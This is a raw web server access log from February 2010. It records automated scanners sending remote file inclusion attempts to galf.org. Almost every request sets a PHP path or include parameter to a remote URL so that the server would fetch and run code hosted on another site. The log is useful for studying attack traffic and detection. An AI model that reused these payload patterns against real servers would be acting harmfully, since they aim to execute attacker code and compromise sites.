200.226.134.29 - - [08/Feb/2010:00:41:55 -0800] "GET /logs/access_100118.log/bbs/write_update.php?board_skin_path=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/idv5.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
200.226.134.29 - - [08/Feb/2010:00:41:55 -0800] "GET /logs/bbs/write_update.php?board_skin_path=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/idv5.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:00:42:17 -0800] "GET /logs/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:00:42:17 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:00:42:20 -0800] "GET /logs/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:00:42:20 -0800] "GET /logs/access_091019.log%20%20/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:00:42:20 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:00:42:22 -0800] "GET /logs/access_091019.log%20%20/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.221.175.60 - - [08/Feb/2010:00:42:29 -0800] "GET /logs/access_100118.log/bbs/write_update.php?board_skin_path=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/idv5.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.galf.org"
89.221.175.60 - - [08/Feb/2010:00:42:29 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/idv5.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.galf.org"
89.221.175.60 - - [08/Feb/2010:00:42:29 -0800] "GET /logs/bbs/write_update.php?board_skin_path=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/idv5.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:00:42:37 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:00:42:41 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:00:42:41 -0800] "GET /logs/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:00:42:41 -0800] "GET /logs/access_091019.log%20%20/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:00:42:42 -0800] "GET /logs/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:00:42:42 -0800] "GET /logs/access_091019.log%20%20/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.174.48.203 - - [08/Feb/2010:00:43:18 -0800] "GET /logs/access_100118.log/bbs/write_update.php?board_skin_path=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
69.174.48.203 - - [08/Feb/2010:00:43:18 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
69.174.48.203 - - [08/Feb/2010:00:43:18 -0800] "GET /logs/bbs/write_update.php?board_skin_path=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:00:43:42 -0800] "GET /logs/access_091228.log/skin/ggambo1100_gallery/setup.php?setup[use_category]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:00:44:04 -0800] "GET /logs/access_090720.log/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:00:44:06 -0800] "GET /logs/access.log%20%20/////skin/ggambo7002_board/comment_modify.php?dir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
89.221.175.60 - - [08/Feb/2010:00:44:06 -0800] "GET /logs/access_100118.log/bbs/write_update.php?board_skin_path=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.galf.org"
89.221.175.60 - - [08/Feb/2010:00:44:07 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.galf.org"
89.221.175.60 - - [08/Feb/2010:00:44:07 -0800] "GET /logs/bbs/write_update.php?board_skin_path=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.galf.org"
81.176.226.164 - - [08/Feb/2010:00:44:56 -0800] "GET /logs/access_100118.log/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.226.134.29 - - [08/Feb/2010:00:45:03 -0800] "GET /logs/access_100118.log/bbs/write_update.php?board_skin_path=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
200.226.134.29 - - [08/Feb/2010:00:45:03 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
200.226.134.29 - - [08/Feb/2010:00:45:03 -0800] "GET /logs/bbs/write_update.php?board_skin_path=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:00:45:16 -0800] "GET /logs/access_090720.log/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [08/Feb/2010:00:46:13 -0800] "GET /logs/access_100104.log%20%20///?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [08/Feb/2010:00:46:13 -0800] "GET //?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [08/Feb/2010:00:46:13 -0800] "GET /logs///?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
69.163.202.84 - - [08/Feb/2010:00:46:14 -0800] "GET //lostpasswd.php?env[include_prefix]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.163.202.84 - - [08/Feb/2010:00:46:14 -0800] "GET /logs/access_090831.log///lostpasswd.php?env[include_prefix]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.163.202.84 - - [08/Feb/2010:00:46:14 -0800] "GET /logs///lostpasswd.php?env[include_prefix]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [08/Feb/2010:00:46:50 -0800] "GET /logs/access_090831.log///lostpasswd.php?env[include_prefix]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [08/Feb/2010:00:46:50 -0800] "GET //lostpasswd.php?env[include_prefix]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [08/Feb/2010:00:46:50 -0800] "GET /logs///lostpasswd.php?env[include_prefix]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.163.202.84 - - [08/Feb/2010:00:46:57 -0800] "GET /logs/access_090831.log///lostpasswd.php?env[include_prefix]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.163.202.84 - - [08/Feb/2010:00:46:57 -0800] "GET //lostpasswd.php?env[include_prefix]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.163.202.84 - - [08/Feb/2010:00:46:57 -0800] "GET /logs///lostpasswd.php?env[include_prefix]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.163.202.84 - - [08/Feb/2010:00:47:15 -0800] "GET /logs/access_090831.log///lostpasswd.php?env[include_prefix]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.163.202.84 - - [08/Feb/2010:00:47:15 -0800] "GET /logs///lostpasswd.php?env[include_prefix]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.163.202.84 - - [08/Feb/2010:00:47:15 -0800] "GET //lostpasswd.php?env[include_prefix]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:00:47:17 -0800] "GET /logs/access_100104.log%20%20///?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:00:47:17 -0800] "GET //?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:00:47:17 -0800] "GET /logs///?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:00:47:19 -0800] "GET /skin/ggambo1100_gallery/setup.php?setup[use_category]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:00:47:19 -0800] "GET /logs/skin/ggambo1100_gallery/setup.php?setup[use_category]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:00:47:23 -0800] "GET /logs/access_091228.log%20%20/skin/ggambo1100_gallery/setup.php?setup[use_category]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:00:47:24 -0800] "GET /skin/ggambo1100_gallery/setup.php?setup[use_category]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:00:47:24 -0800] "GET /logs/skin/ggambo1100_gallery/setup.php?setup[use_category]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:00:47:25 -0800] "GET /logs/access_091228.log/skin/ggambo1100_gallery/setup.php?setup[use_category]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [08/Feb/2010:00:47:34 -0800] "GET /logs/access_090921.log%20%20/?sourcedir=http://musicadelibreria.net/footer??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:00:47:35 -0800] "GET /logs/access.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.126 - - [08/Feb/2010:00:48:01 -0800] "GET /logs/access_100104.log%20%20///?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:00:48:01 -0800] "GET //?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:00:48:01 -0800] "GET /logs///?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [08/Feb/2010:00:48:02 -0800] "GET /logs/access_090831.log%20%20///lostpasswd.php?env[include_prefix]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [08/Feb/2010:00:48:02 -0800] "GET //lostpasswd.php?env[include_prefix]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [08/Feb/2010:00:48:02 -0800] "GET /logs///lostpasswd.php?env[include_prefix]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:00:48:31 -0800] "GET ////skin/ggambo7002_board/comment_modify.php?dir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:00:48:31 -0800] "GET /logs/////skin/ggambo7002_board/comment_modify.php?dir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:00:48:31 -0800] "GET /logs/access_100118.log%20%20/////skin/ggambo7002_board/comment_modify.php?dir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [08/Feb/2010:00:48:32 -0800] "GET /logs/access_090831.log///lostpasswd.php?env[include_prefix]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [08/Feb/2010:00:48:32 -0800] "GET //lostpasswd.php?env[include_prefix]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [08/Feb/2010:00:48:32 -0800] "GET /logs///lostpasswd.php?env[include_prefix]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:00:48:33 -0800] "GET /logs/access.log%20%20/////skin/ggambo7002_board/comment_modify.php?dir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.125 - - [08/Feb/2010:00:49:12 -0800] "GET /skin/ggambo1100_gallery/setup.php?setup[use_category]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:00:49:12 -0800] "GET /logs/access_091228.log/skin/ggambo1100_gallery/setup.php?setup[use_category]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:00:49:12 -0800] "GET /logs/skin/ggambo1100_gallery/setup.php?setup[use_category]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [08/Feb/2010:00:49:23 -0800] "GET //lostpasswd.php?env[include_prefix]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [08/Feb/2010:00:49:23 -0800] "GET /logs/access_100125.log%20%20///lostpasswd.php?env[include_prefix]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [08/Feb/2010:00:49:23 -0800] "GET /logs///lostpasswd.php?env[include_prefix]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:00:49:24 -0800] "GET /logs/access_100104.log%20%20///?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:00:49:24 -0800] "GET //?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:00:49:24 -0800] "GET /logs///?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:00:49:27 -0800] "GET /logs/access.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
65.55.51.112 - - [08/Feb/2010:00:49:30 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:00:50:03 -0800] "GET /logs///lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:00:50:03 -0800] "GET /logs/access_100125.log%20%20///lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:00:50:03 -0800] "GET //lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:00:50:08 -0800] "GET /logs/access_100125.log%20%20///lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:00:50:08 -0800] "GET //lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:00:50:08 -0800] "GET /logs///lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:00:50:47 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.126 - - [08/Feb/2010:00:50:47 -0800] "GET /logs/access.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.126 - - [08/Feb/2010:00:50:47 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [08/Feb/2010:00:50:48 -0800] "GET /logs/access_090921.log%20%20/?sourcedir=http://musicadelibreria.net/footer??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:00:50:50 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.126 - - [08/Feb/2010:00:50:50 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.126 - - [08/Feb/2010:00:50:50 -0800] "GET /logs/access.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
81.176.226.164 - - [08/Feb/2010:00:50:51 -0800] "GET /logs/access_100125.log///lostpasswd.php?env[include_prefix]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [08/Feb/2010:00:50:51 -0800] "GET /logs///lostpasswd.php?env[include_prefix]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [08/Feb/2010:00:50:51 -0800] "GET //lostpasswd.php?env[include_prefix]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:00:51:02 -0800] "GET /logs/access_100104.log%20%20///?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:00:51:02 -0800] "GET //?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:00:51:02 -0800] "GET /logs///?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:00:51:13 -0800] "GET /logs/access_100125.log%20%20///lostpasswd.php?env[include_prefix]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:00:51:13 -0800] "GET /logs///lostpasswd.php?env[include_prefix]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:00:51:13 -0800] "GET //lostpasswd.php?env[include_prefix]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [08/Feb/2010:00:51:28 -0800] "GET /logs/access_090907.log%20%20/?sourcedir=http://musicadelibreria.net/footer??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:00:51:49 -0800] "GET /logs/access_100118.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:00:51:49 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:00:51:53 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
65.55.51.112 - - [08/Feb/2010:00:52:23 -0800] "GET /tmp/?S=A HTTP/1.1" 200 520 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:00:52:34 -0800] "GET //?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:00:52:34 -0800] "GET /logs/access_100104.log%20%20///?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:00:52:34 -0800] "GET /logs///?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [08/Feb/2010:00:52:38 -0800] "GET /logs/access_090907.log%20%20/?sourcedir=http://musicadelibreria.net/footer??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [08/Feb/2010:00:52:44 -0800] "GET /logs/access_100118.log%20%20//index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:00:52:58 -0800] "GET /logs/////skin/ggambo7002_board/comment_modify.php?dir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:00:52:58 -0800] "GET ////skin/ggambo7002_board/comment_modify.php?dir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:00:52:58 -0800] "GET /logs/access_100118.log%20%20/////skin/ggambo7002_board/comment_modify.php?dir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [08/Feb/2010:00:53:06 -0800] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [08/Feb/2010:00:53:06 -0800] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [08/Feb/2010:00:53:06 -0800] "GET /logs/access_100118.log//index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
147.46.233.192 - - [08/Feb/2010:00:53:11 -0800] "GET /logs/////skin/ggambo7002_board/comment_modify.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
147.46.233.192 - - [08/Feb/2010:00:53:38 -0800] "GET ////skin/ggambo7002_board/comment_modify.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.125 - - [08/Feb/2010:00:53:54 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:00:53:54 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:00:53:55 -0800] "GET /logs/access_100118.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:00:55:02 -0800] "GET ////skin/ggambo7002_board/comment_modify.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.125 - - [08/Feb/2010:00:55:08 -0800] "GET /logs/////skin/ggambo7002_board/comment_modify.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.125 - - [08/Feb/2010:00:55:09 -0800] "GET /logs/access.log/////skin/ggambo7002_board/comment_modify.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
